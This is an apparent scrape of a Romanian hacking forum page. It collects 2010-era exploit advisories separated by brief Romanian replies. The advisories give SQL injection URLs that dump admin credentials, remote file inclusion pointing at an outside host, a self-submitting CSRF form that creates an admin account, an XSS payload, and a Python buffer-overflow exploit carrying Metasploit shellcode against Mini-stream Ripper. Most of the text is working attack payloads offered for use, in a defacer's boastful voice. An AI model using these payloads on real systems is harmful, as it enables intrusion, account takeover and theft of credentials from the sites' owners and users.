ANdreicj

[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: suffer from multi SQL !NJECTON Vulnerability [~] Vendor: phpcityportal.com [?] Software : PhpCityPortal [-] pR!CE : -PURCHASE 1 LICENSE - $149 each -PURCHASE 3 LICENSES - $119 each -PURCHASE 5 LICENSES - $99 each -PURCHASE 6 OR MORE LICENSES PLEASE CONTACT US FOR PRICING. [?] author: ((R3d-D3v!L)) [?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY [?] contact: N/A [-] [?] Date: 10.MAR.2010 [?] T!ME: 04:15 pm GMT [?] Home: WwW.xP10.ME [?] [?] [-]??????????????????????{DEV!L'5 of SYST3M}?????????????????? SQL Injection: [*] Err0r C0N50L3: http://TARGET/P47H/video_show.php?id=SQL http://TARGET/P47H/spotlight_detail.php?id=SQL http://TARGET/P47H/real_estate_details.php?id=sql http://TARGET/P47H/auto_details.php?id=sql [~] {EV!L EXPLO!T}: [*]FORb!d3N Remote File Inclusion: [*] Err0r C0N50L3: http://TARGET/P47H/external.php?url=include your fucken evil shell [~] {EV!L EXPLO!T}: like: http://server/external.php?url=http://xp10.me N073: REAL RED DEV!L W@S h3r3 LAMERZ GAZA !N our hearts ! [~]-----------------------------{((MAGOUSH-87))}--------------------------------------- [~] Greetz tO: dolly & MERNA & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush-1987 [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 [?]spechial SupP0RT: MY M!ND & dookie2000ca &((OFFsec)) [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) [~]spechial FR!ND: 74M3M [~] !'M 4R48!4N 3XPL0!73R. [~]{[(D!R 4ll 0R D!E)]}; [~]---------------------------------------------------------------------------------------------

[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm cr4wl3r member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: cr4wl3r [+] Download: http://isp-control.net/ [+] Dork: "Powered by ispCP Omega" [+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php] [x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?> [+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell] [+] Greetz and thanks to: [!] str0ke [milw0rm.com] [!] r0073r, 0x1D [inj3ct0r.com] [!] opt!x hacker [morrocan hacker] [!] xoron [turkish hacker] [!] irvian, cyberlog, [sekuritionline.net] [!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net] [!] boom3rang [khg-cr3w.org]

[CODE]======================================================================= Anantasoft Gazelle CMS CSRF Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software Anantasoft_Gazelle_CMS # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS Script to Add the Admin user through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="XYZ" action="http://server/gazelle/admin/index.php?Users/Add%20User" method="post"> <input type=hidden name="name" value="master"> <input type=hidden name="pass" value="master"> <input type=hidden name="controle" value="master"> <input type=hidden name="email" value="master%40yahoo.com"> <input type=hidden name="active" value="on"> <input type=hidden name="showemail" value="on"> <input type=hidden name="admin%5B%5D" value="2"> <input type=hidden name="save" value="Add"> <input type=hidden name="table" value="users"> <input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36"> </form> <script> document.XYZ.submit(); </script> </body> </html> . .................................................................................................................. After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. #If you have any questions, comments, or concerns, feel free to contact me.

----------------------------Information------------------------------------------------ +Name : Softbiz Jobs & Recruitment Script SQL INJECTION search_result.php +Autor : Easy Laster +Date : 10.03.2010 +Script : Softbiz Jobs & Recruitment Script +Price : 129$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/sbjbs/search_result.php?cid= +Exploitable : http://www.site.com/sbjbs/search_result.php?cid=9999999+union+select+1 ,concat(sb_admin_name,0x3a,sb_pwd),3,4+from+sbjbs_admin# -----------------------------------------------------------------------------------------

#!/usr/bin/env python #Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution #Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe #Author: l3D #Site: http://xraysecurity.blogspot.com #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com nops1='\x90'*0x2a80 #system("calc") - Metasploit.com shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4" "\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96" "\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b" "\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2" "\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26" "\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae" "\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94" "\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20" "\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51" "\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d" "\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8" "\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70" "\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f" "\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac" "\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e") nops2='\x90'*(0xa9ff-len(nops1+shellcode)) ret='\x30\x3D\x0D' payload=nops1+shellcode+nops2+ret evil="""<ASX Version="3.0"> <ENTRY> <REF HREF="%s"/> </ENTRY> </ASX> """ % payload bad=open('crash.m3u', 'w') bad.write(evil) bad.close()

Traiasca Romania si infractiunile !

E demult melodia ..

Folositor, bravo.

Bun venit !

Vreau sa particip la raid

Cea mai proasta idee ..

Care e licenta ?

Mari haxori .. vai de voi ma.

Tu cum sa nu-l astepti, +1 P.S : Scuze de off.

======================================================== #################################################################### # Author : Palyo34 # Home : www.1923Turk.com # Script : CMS by MyWorks # Script site: http://www.myworks.spb.ru/ #################################################################### ===[ Exploit ]=== http://server/catalog/good.php?good_id= SQL INJECTION 1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 Demo: http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 ################################################################### ===[XSS Vulnerability]=== http://server/catalog/good.php?good_id= http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>

Hacker ?! sau flamand ?

Happy 1 martie.

Sunt frumoase .. felicitari !.

Pune dreq sursa .. .

http://www.jurnalul.ro/stire-sport/site-ul-oficial-al-cfr-timisoara-a-fost-spart-de-hackeri-536889.html "Ac?iunea împotriva site-ului este "revendicat?" de c?tre eXcEsuHk & U Cluj Fans." Hahaha.

Da-i 2 in burta .. .

Felicitari .. +1 rep

Hehe, mersi benny !.

Ratati ..